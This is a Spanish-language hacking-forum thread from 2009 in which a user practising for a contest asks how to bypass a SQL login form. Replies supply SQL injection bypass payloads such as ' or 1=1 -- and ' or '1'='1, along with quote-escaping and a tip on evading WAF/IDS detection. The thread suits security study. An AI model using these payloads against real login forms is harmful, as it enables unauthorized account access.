elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Problema al intentar inyeccion SQL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Problema al intentar inyeccion SQL  (Leído 4,300 veces)
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Problema al intentar inyeccion SQL
« en: 3 Noviembre 2009, 14:53 pm »

Código:
ERROR SQL: SELECT * FROM usuarios WHERE usuario=''order by 90'' AND clave=''order by 90''::SQL logic error or missing database

este codigo esta sacado de un hack contest, me estoy preparando para cuando llegue a mi localidad que es dentro de dos semanas y estoy practicando ya que deje un poco de la do el deface y me dedique a programar


veran, el reto consiste en superar un login sql, que digo yo, sera por inyeccion, y por lo que veo su estructura es esta

SELECT * FROM usuarios WHERE usuario='$_POST[usuario]' AND clave='$_POST[clave]'

el problema que tengo es que si inyecto codigo para intentar bypasear quedaria asi

SELECT * FROM usuarios WHERE usuario='soler or 1= 1' AND clave='soler or 1=1'

entonces los or quedarian dentro de las comillas, que podria hacer?
« Última modificación: 3 Noviembre 2009, 19:08 pm por KARR » En línea

Kasi

Desconectado Desconectado

Mensajes: 76



Ver Perfil
Re: Problema al intentar inyeccion SQL
« Respuesta #1 en: 3 Noviembre 2009, 22:07 pm »

Buenas, primero tienes que conseguir salir de las comillas, la manera mas sencilla es poniendo otra comilla antes de los datos, por ejemplo :

Si la SQL de login es esta :

Código:
SELECT * FROM usuarios WHERE usuario='$_POST[usuario]' AND clave='$_POST[clave]'

y de login pones soler y de pass 1234 quedaria :

Código:
SELECT * FROM usuarios WHERE usuario='soler' AND clave='1234'

pero si pones de login :
Código:
' or  1=1 --
podrias escapar la SQL quedando asi :
Código:
SELECT * FROM usuarios WHERE usuario='' or 1=1 --' AND clave='1234'

Aunque la clave ya daria igual lo que pongas puesto que seria un comentario.

Donde los dos guiones son comentarios (al igual que las // en C o la ' en VB)

Esta es la manera mas simple de inyectar SQL, la mas conocida y por lo tanto la mas vigilada, pero bueno te sorprenderia saber que todavia existen sitios donde cuela xDD.

Un saludo
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.292


Ver Perfil
Re: Problema al intentar inyeccion SQL
« Respuesta #2 en: 3 Noviembre 2009, 22:11 pm »

' or '1'='1 tmb funcaria no ? (en password no user)
tmb se podria . si no me fallan los calculos

user: asdas
pass: asdas' or '1'='1

creo que asi lo hice una ves :¬¬
b3rz3k o algo asi el nick :P
habia puesto una lista.. fijate si lo encontras x ahi
saludos
En línea

LightOS

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Problema al intentar inyeccion SQL
« Respuesta #3 en: 3 Noviembre 2009, 22:29 pm »

Si la BD es MySQL, el -- no funciona, se tiene que usar -- -
entonces lo mas pratico seria
' or '
que queda asi:
SELECT * FROM usuarios WHERE usuario='' or '' AND clave='' or ''
Tambien es menos probable que lo detecte un WAF/IDS.
En línea

50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Problema al intentar inyeccion SQL
« Respuesta #4 en: 3 Noviembre 2009, 22:33 pm »

mirare haber si cuela, gracias ;)
En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.410


The Hacktivism is not a crime


Ver Perfil WWW
Re: Problema al intentar inyeccion SQL
« Respuesta #5 en: 3 Noviembre 2009, 22:37 pm »

Hola, prueba con un user válido porque si le das un user que no existe no le hará select a nada.

admin' and 1=1--+

o puedes obtener el primer id con

x' or like usuario '%' limit 1 --+

con eso invalidas la primera comparación "=" y le inyectas un like y por orden mysql obtendrá el primer resultado de arriba hacia abajo ya que le indicamos un limit 1 para que no haya problemas al mostrar los datos en pantalla o si no te dirá error y terminas con un comentario para invalidar el resto de la query.
En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Problema al intentar inyeccion SQL
« Respuesta #6 en: 4 Noviembre 2009, 22:48 pm »

whk, la sentencia que me devuelve es esta:

ERROR SQL: SELECT * FROM usuarios WHERE usuario='x' or like usuario '%' limit 1 --+' AND clave='sax'::SQL logic error or missing database

lo testee con el sql inyect mee de security compas y dice que el formulario no contiene inyeccion sql mmm, de que otra forma se puede pasar un formulario sql si no es con inyeccion?

madre mia tiene que ser facilisimo  :(
En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.589


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Problema al intentar inyeccion SQL
« Respuesta #7 en: 5 Noviembre 2009, 05:22 am »

AND clave='sax'

De donde sale este dato, tu lo injectastes o que onda
En línea

Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Problema al intentar inyeccion SQL
« Respuesta #8 en: 5 Noviembre 2009, 11:20 am »

si, lo inyecte, por poner algo
En línea

braulio--
Wiki

Desconectado Desconectado

Mensajes: 896


Imagen recursiva


Ver Perfil WWW
Re: Problema al intentar inyeccion SQL
« Respuesta #9 en: 5 Noviembre 2009, 14:01 pm »

Y que pasó con los primeros?
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con codigo al intentar validar en W3C
Desarrollo Web
Neilprydehack 8 3,161 Último mensaje 9 Enero 2011, 12:45 pm
por Neilprydehack
Problema al intentar migrar una pagina Typo3
PHP
BASUH 2 1,337 Último mensaje 3 Febrero 2017, 08:34 am
por BASUH
Problema al intentar explotar eternal blue por segunda vez
Hacking Ético
aangrymasther 0 540 Último mensaje 9 Mayo 2018, 13:58 pm
por aangrymasther
Problema al intentar logarme en el foro
Sugerencias y dudas sobre el Foro
zellion 4 872 Último mensaje 16 Julio 2019, 08:47 am
por zellion
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines